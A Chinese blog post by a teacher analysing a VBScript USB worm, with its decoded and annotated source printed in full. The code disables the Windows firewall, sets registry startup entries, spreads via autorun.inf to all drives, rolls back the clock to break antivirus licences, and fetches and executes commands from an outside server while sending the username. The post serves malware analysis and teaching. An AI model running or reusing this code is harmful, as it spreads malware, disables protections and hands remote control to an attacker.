最近一位同事的筆記本遭遇了這個病毒,正好這學期在給計算機專業(yè)的同學們上VBscript于是順便分析了一下�。
首先從染病毒的計算機上提取下來病毒樣本�,由于是臨時發(fā)現(xiàn)的���,也沒有特別準備��,就用winrar壓縮后保存���。
在實驗機器上打開病毒樣本的壓縮文件���,我的Symantec 11立即報警���,并把病毒刪除了��。所以必須禁用殺毒軟件或者設(shè)置一個“例外區(qū)域”用于分析病毒,于是在桌面上新建了“evA”文件夾���,并將之設(shè)置為防病毒例外文件夾,這下病毒樣本安靜的躺在里面了��。
腳本病毒是解釋型程序�����,因此我們不需要什么特別的反編譯工具就能查看源代碼了�。雖然Windows的記事本足夠用了����,但是我還是喜歡使用UltraEdit����。
使用打開UltraEdit打開病毒文件如圖1,注意,為了防止誤觸發(fā)病毒���,這里首先將vbs擴展名修改為txt���。
圖1 病毒腳本
打開病毒腳本��,大家可以發(fā)現(xiàn)代碼的可讀性非常差,大小寫字母雜亂的排列���,并且還有很多無法理解的符號串�����。其實這是病毒為了保存自己而“想”出來的“保護傘”�。
病毒代碼大小寫問題可以在UE(以后UltraEdit簡稱)中選擇文本后����,使用Ctrl+F5直接轉(zhuǎn)換成小寫字母���。對于類似密碼的“00c2%0033%……”的字符串相對來說比較麻煩點��。
從病毒代碼中可以發(fā)現(xiàn)只要出現(xiàn)“亂碼”的地方都會有“STrREVeRSE”和“unEscaPE”函數(shù)的調(diào)用�����,其中“unescape”是vbscript標準函數(shù)���,作用就是將經(jīng)過escape函數(shù)編碼過的字符串進行反編碼。這里需要說明一下�����,由于Web中的Html對于有些符號是進行保留使用的����,比如“”和“>”符號�,如果需要對這些符號進行顯示那么需要對他們進行html編碼�����,所有空格����、標點�、重音符號以及其他非 ASCII 字符都用 %xx 編碼代替����,其中 xx 等于表示該字符的十六進制數(shù)��。例如�����,空格返回的是 "%20" ���。字符值大于 255 的�����,比如中文����,以 %uxxxx 格式存儲���。在對“密碼”進行分析,發(fā)現(xiàn)其實就是將escape編碼的符號串進行了反向,再結(jié)合“STrREVeRSE”函數(shù)名�����,可以斷定病毒作者為了能使病毒逃避殺毒軟件的檢測,采用了將關(guān)鍵代碼進行編碼和反向存儲的方式���。
在UE中可以直接對字符串進行編碼和解碼��,不過要對字符串鏡像并沒有現(xiàn)成的工具可以使用��,最近正在給學生上JavaScript�����,順手寫了一個頁面進行解碼或者編碼,雖然很簡單����,不過為了敘述的連續(xù)性����,代碼如下:
復制代碼 代碼如下:
!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
html xmlns="http://www.w3.org/1999/xhtml">
head>
meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
title>將字符串Reverse/title>
script type="text/javascript">
function _reverse()
{
with(document){
if(rev.order.checked){
revedstr = rev.instr.value.split('').reverse().join('')
write("strong>reversed string:/strong>",revedstr,"br>");
write("strong>unescape string:/strong>",unescape(revedstr),"br>");
write("strong>escape string:/strong>",escape(revedstr),"br>");
}
else{
unescapstr = unescape(rev.instr.value);
revedstr = unescapstr.split('').reverse().join('');
write("strong>uneacape string:/strong>",unescapstr,"br/>");
write("strong>reversed string:/strong>",revedstr);
}
}
}
/script>
/head>
body>
form action="" method="post" name="rev">
input name="order" type="checkbox" value="" />轉(zhuǎn)換順序(先求反后解碼)?br />
input name="instr" type="text" value="請在這里輸入" onmousemove="this.select()"/>
input name="" type="button" value="轉(zhuǎn)換" onclick="_reverse()"/>/form>
/body>
/html>
使用以上的工具對代碼進行解碼后代碼如下:
復制代碼 代碼如下:
On Error Resume Next
Set fso=CreateObject("scripting.filesystemobject")
Set wshshell=CreateObject(strreverse("wscript.shell"))
Dim dri_list,dri_list0
Dim issend
issend=0
c_time=Date()
' 這是關(guān)閉SharedAccess(Intemet連接共享和防火墻服務(wù))����。
wshshell.run "net stop sharedaccess",0
Set drvs=fso.drives
sysdir=fso.GetSpecialFolder(1) 'WindowsFolder=0,SystemFolder=1, TemporaryFolder=2
thispath=wscript.ScriptFullName
Set fc=fso.OpenTextFile(thispath,1) 'ForReading=1,ForWriting=2 ,ForAppending=8
scopy=fc.readall
fc.Close
Set fc=Nothing
' 寫注冊表注冊文件sysinfo.reg,注冊系統(tǒng)開機自動執(zhí)行病毒
Call writefile(sysdir"\sysinfo.reg","windows registry editor version 5.00 [hkey_local_machine\software\policies\microsoft\windows\system\scripts\startup\0\0] "script"="%windir%\\system32\\prncfg.vbs" "parameters"="" "exectime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 [hkey_local_machine\software\microsoft\windows\currentversion\group policy\state\machine\scripts\startup\0\0] "script"="%windir%\\system32\\prncfg.vbs" "parameters"="" "exectime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
")
' 導入注冊表sysinfo.reg
wshshell.run "regedit /s sysinfo.reg",0
wscript.sleep 200
fso.deletefile sysdir"\sysinfo.reg",True
' 如果當前運行腳本在系統(tǒng)目錄中
If InStr(thispath,sysdir)>0 Then
dri_list0=listdrv()
o_time=left(c_time,3)cstr(Int(Mid(c_time,4,1))-1)Right(c_time,Len(c_time)-4) '回撥時間1年
wshshell.run "cmd /c Date "o_time,0
wscript.sleep 10000
For dri_i=1 to Len(dri_list0)
Call writeauto(Mid(dri_list0,dri_i,1)":\")
Next
wshshell.run "cmd /c Date "c_time,0
' WMI應(yīng)用查詢計算機名,用戶名
computername="":username=""
Set objwmiservice=GetObject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
Set colcomputers = objwmiservice.execquery("select * from win32_computersystem")
For Each objcomputer in colcomputers
computername=objcomputer.name
username=objcomputer.username
Next
If username="" Then username="evar"
If InStr(username,"\")=0 Then
username=computername"\"username
End If
do
If issend=0 Then
' 鏈接外網(wǎng),獲得執(zhí)行代碼
Set xml=CreateObject("msxml2.serverxmlhttp")
xml.open "get","http://202.119.104.100/zzb/eva/count.asp?a="username,0
' http://202.119.104.100/zzb/是南師大學校黨委組織部主辦的網(wǎng)站
xml.setrequestheader "user-agent","evar"
xml.send()
If Err.number=0 Then
issend=1
res=xml.responsetext
If ucase(left(res,7))=ucase("Execute") Then Execute res
Else
Err.clear
End If
Set xml=Nothing
End If
dri_list=listdrv()
For dri_k=1 to Len(dri_list)
If InStr(dri_list0,Mid(dri_list,dri_k,1))=0 Then
Call writeauto(Mid(dri_list,dri_k,1)":\")
End If
Next
dri_list0=dri_list
wscript.sleep 1000
loop
Else
wshshell.run "explorer .\",3
wscript.sleep 2000
wshshell.appactivate LCase("我的電腦")
wshshell.sendkeys UCase("% c") ' 模擬擊鍵 alt + space + c ,其實就是關(guān)閉窗口
runflag=0
' 獲得當前系統(tǒng)進程�,WMI的應(yīng)用
For each ps in GetObject _
("winmgmts:\\.\root\cimv2:win32_process").instances_
If lcase(ps.name)=lcase("wscript.exe") Then
runflag=runflag+1
End If
Next
If runflag>=2 Then wscript.quit
Set sf=fso.GetFolder(sysdir)
f_time=Left(sf.datecreated,InStr(sf.datecreated," ")-1)
wshshell.run "cmd /c Date "f_time,0
wscript.sleep 100
Call writefile(sysdirlcase("\prncfg.vbs"),vs(scopy))
wshshell.run "cmd /c Date "c_time,0
wshshell.run sysdir"\prncfg.vbs"
End If
' 混亂字符串,進行代碼變體!
Function vs(str)
Execute "For i=1 to Len(str) c=ucase(Mid(str,i,1)) randomize If Int(rnd()*100)>50 Then vs=vslcase(c) Else vs=vsc End If Next vs=replace(vs,ucase("%u"),lcase("%u"))"
End Function
' 列出驅(qū)動器
Function listdrv()
Execute "Dim tmp_list tmp_list="" For each drv in drvs If drv.isready Then tmp_list=tmp_listdrv.driveletter End If Next listdrv=tmp_list"
End Function
' 寫autorun.inf文件
Sub writeauto(path)
' 寫Auto文件前的準備���,如果path中有autorun.inf文件夾那么重命名;如果有autorun.inf文件則刪除
Execute "If fso.folderexists(path"autorun.inf") Then fso.movefolder path"autorun.inf",pathrnd() elseif fso.fileexists(path"autorun.inf") Then fso.deletefile path"autorun.inf",true End If"
' autorun.inf中的啟動代碼
cmdstr="shell\*\command=wscript.exe "chr(34)"eva.vbs"chr(34)
autostr="[autorun]"vbcrlf"open="vbcrlfreplace(cmdstr,"*","open")vbcrlfreplace(cmdstr,"*","explore")vbcrlfreplace(cmdstr,"*","find")
' 寫入
Call writefile(pathucase("autorun.inf"),autostr)
Call writefile(path"eva.vbs",vs(scopy))
End Sub
'將content中的內(nèi)容寫入fpath�,并設(shè)置文件屬性是ReadOnly����、Hidden和System
Sub writefile(fpath,content)
Execute "If fso.fileexists(fpath) Then fso.deletefile fpath,true Set fc=fso.OpenTextFile(fpath,2,true) fc.write content fc.Close Set fc=Nothing Set fa=fso.getfile(fpath) fa.attributes=7 Set fa=Nothing"
End Sub
以上的代碼已經(jīng)添加了很多注釋����,如果你能奈著性子看到這里�,估計應(yīng)該明白的差不多了��。代碼本身的編碼質(zhì)量一般���,因為這個代碼在下載病毒指令是從南師大的一個網(wǎng)站上下載的�,所以估計是個學生所為����。
在這段病毒中����,作者使用了自定義的vs函數(shù)進行“變臉”以逃避防病毒檢測���,使用隨機方式對病毒體進行大小寫轉(zhuǎn)換,不過實際上這種處理對真正的防病毒軟件是沒有任何效果的J
在這個病毒中���,使用了注冊表���,Windows自動運行,文件操作還有WMI控制等技術(shù)�,這些都是當前Windows環(huán)境中主流技術(shù)?����?梢园l(fā)現(xiàn)這些技術(shù)微軟都為腳本�����,特別是VBScrit提供了調(diào)用接口,從技術(shù)上講是COM組件都提供了Automation接口�����,支持各種腳本的調(diào)用�,本來是為了讓Windows腳本能做更過的事,但是他們也“很好”好的為病毒服務(wù)����,因此我們在這里分析病毒主要目的不是為了編寫病毒���,而是學習編程技術(shù),利用其中的技術(shù)為我們的工作和學習提供方便�。因此希望學習腳本編程的朋友�����,可以好好分析這個鮮活的例子。
以上說了那么多�,其實還是沒有怎么詳細說道病毒,雖然我總是覺得代碼就是最好的解釋����,但是總不能對不起標題上“分析”這兩個字吧��。
其實這個病毒主要還是利用的Windows的Autorun.inf文件運轉(zhuǎn)的���。作為病毒�,必須用戶去運行����,無論是直接還是間接的�����。當“無知用戶”雙擊帶毒U盤等瞬間,Autorun.inf文件中指向的eva.vbs病毒啟動了���,首先通過關(guān)閉“SharedAccess”服務(wù)實現(xiàn)關(guān)閉Windows自帶的防火墻,這主要是為了讓后面的病毒能夠和外部的傀儡網(wǎng)站進行通信做準備�。
關(guān)閉防火墻后�����,腳本寫入一個注冊表文件�,通過后面在代碼中將之導入系統(tǒng)以實現(xiàn)病毒開機啟動,其實這也是病毒的共同特征���。程序在啟動之后,需要判斷當前是否已經(jīng)被感染�,通常腳本對當前系統(tǒng)進程的情況進行處理是比較困那的���,不過還好,Windows的WMI為腳本訪問系統(tǒng)功能提供了大量的接口����,這里使用它檢測系統(tǒng)中是否有多份病毒進程���,如果有那么就會自動退出�����。這個病毒中其實主要的功能就是復制���,這也是被定義為worm病毒的原因,但其中有個重要的特征值的讓我覺得很有意思����,就是這個病毒程序居然會執(zhí)行從傀儡服務(wù)器發(fā)送來的病毒命令����。
在這個病毒中����,利用ServerXMLHTTP組件和傀儡服務(wù)器進行通訊�,這個技術(shù)其實就是我們現(xiàn)在流行的AJAX技術(shù)中的基礎(chǔ)。在這里和服務(wù)器通訊���,并執(zhí)行從服務(wù)器下載的病毒代碼,這體現(xiàn)了現(xiàn)在病毒作者希望能夠長期對“肉雞”的控制����,但是讓我不能理解的是,病毒中有段代碼是對當前計算機用戶的賬戶進行檢測的�,并將用戶信息發(fā)送到服務(wù)器上。眾多周知�,國人的操作系統(tǒng)中D版居多,其中這段時間被鬧的沸沸揚揚的“番茄花園”之類的改版Windows居多�,這類Windows均有個共同的個點���,就是安裝的系統(tǒng)都會使用他們的“品牌”作為用戶名����,比如“番茄花園”版的Windows中默認用戶常常就是“番茄花園”���。從這個病毒代碼上看����,難道它還要對Windwos版本進行一個“D版占有量普查”么�?
最后還要提到的一點就是這個病毒對系統(tǒng)時間的修改,通過修改系統(tǒng)時間進行對防病毒軟件的攻擊往往是致命的�����。說起來比較有諷刺意味�����,被這個病毒僅僅通過將時間向前倒撥一年,這樣很多防病毒軟件的授權(quán)時間就變成了非法的,這就好像當年WindowsXP剛發(fā)布的時候���,設(shè)置錯誤的時間可能會造成系統(tǒng)奔潰一樣。錯誤的時間往往會破壞一個看似堅固的系統(tǒng)�����。通過這種方式���,Kaspersky的授權(quán)時間變成了非法���,隨之而來的就是防病毒引擎掛起,這樣這個沒有技術(shù)沒有難度的學生病毒就能大行其道了���。這難道不是對防病毒廠商的諷刺么�?為了保護自己的利益(使用時間授權(quán)),而讓用戶冒著被病毒攻擊的危險�。事實上���,有些防病毒廠商就注意到這個問題,如果授權(quán)過期了也不應(yīng)該關(guān)閉查殺引擎����,最多關(guān)閉放病毒庫的更新�。另外這個病毒修改時間最妙的是把時間向前調(diào)整而不是往后,因為你不會知道不同的用戶的防病毒軟件的授權(quán)時間是1年還是n年���,不過可以肯定,把時間向前調(diào)整一年的方式�,可能對人而言同樣的授權(quán)還是正常的,但是對于計算機就難以理解了。
以上是我對這個病毒的簡單分析����,主要談了自己所感興趣的幾個部分�����。下面談?wù)剬τ诓《镜姆雷o���,前端時間,我參加了Symantec南京的一個產(chǎn)品發(fā)布會����,會上有個銷售在介紹他們的產(chǎn)品�����,其中他說到了一句會�,“現(xiàn)在沒有誰會讓自己的電腦裸奔?���。����?���!”。相信很多朋友都知道�����,這里的裸奔就是指不安裝計算機殺毒軟件的電腦�。實際上這個銷售說錯了����,我曾經(jīng)就有過1年多的時間“裸奔”����,并且系統(tǒng)一直沒有出現(xiàn)任何問題���,不是我自己說的�,是后來我安裝了某品牌的防病毒軟件進行了掃描后沒有發(fā)現(xiàn)任何病毒的蹤影。至于為什么后來安裝了���,完全是為了測試某品牌的殺毒軟件,后來也懶的刪除。
那么很多朋友要說�����,你可真是“神人”��。我要答復的事�,其實并不“神”,你們也可以做到�,關(guān)鍵是你去不去做!
從這個病毒的運行全過程我們可以發(fā)現(xiàn)���,基本上關(guān)鍵的操作都是需要系統(tǒng)管理員級別才能成功的���。例如修改時間���,枚舉系統(tǒng)進程��,對注冊表進行讀寫����。如果你所使用計算機的賬戶僅僅是個普通User權(quán)限,我想這個病毒就和你無緣了���。
另外由于喜歡分析病毒的行為���,這也為我“逃避”病毒找到了一些技巧�����。因為早在多年以前,我就分析過“歡樂時光”腳本病毒���,那時候還不是很懂vbs腳本����,可以說是病毒讓我進一步了解了vbs腳本的能力�����,為我后來能夠在工作中靈活運用腳本解決問題給了一個啟發(fā)����!
附錄:Symantec對該病毒的資料
Discovered: March 12, 2007
Updated: March 12, 2007 5:17:48 PM
Type: Worm
Infection Length: 1,112 bytes
Systems Affected: Windows 98, Windows 95, Windows XP, Windows Me, Windows NT, Windows 2000
VBS.Runauto is a Visual Basic script worm that copies itself in the root folder of all drives (including removable devices) except floppy drives.
ProtectionInitial Rapid Release version March 13, 2007
Latest Rapid Release version September 17, 2008 revision 038
Initial Daily Certified version March 13, 2007
Latest Daily Certified version September 17, 2008 revision 039
Initial Weekly Certified release date March 14, 2007
Click here for a more detailed description of Rapid Release and Daily Certified virus definitions.
Threat AssessmentWildWild Level: Low
Number of Infections: 0 - 49
Number of Sites: 0 - 2
Geographical Distribution: Low
Threat Containment: Easy
Removal: Easy
DamageDamage Level: Low
Payload: Copies itself to all drives on the compromised computer.
DistributionDistribution Level: Low
Writeup By: Mircea Ciubotariu
您可能感興趣的文章:- linux服務(wù)器被植入ddgs、qW3xT.2挖礦病毒的處理實戰(zhàn)記錄
- 通過批處理關(guān)閉135 137 445等端口的實現(xiàn)代碼(勒索病毒)
- 對一個vbs腳本病毒的病毒原理分析
- php網(wǎng)頁病毒清除類
- VC實現(xiàn)的病毒專殺工具完整實例
- 利用DOS命令來對抗U盤病毒保護U盤數(shù)據(jù)
- 自制殺u盤病毒的批處理代碼
- c病毒程序原理分析(防范病毒 c語言小病毒示例)
- 解析:清除SQL被注入惡意病毒代碼的語句
- Autorun 病毒清除工具bat代碼
- 一段病毒常用的VBS代碼
- 記事本U盤病毒 Notepad.exe查殺方法
- 美女游戲病毒iwbkvd.exe查殺方法
- 批處理 Autorun 病毒清除工具
- Rootkit病毒的解決辦法
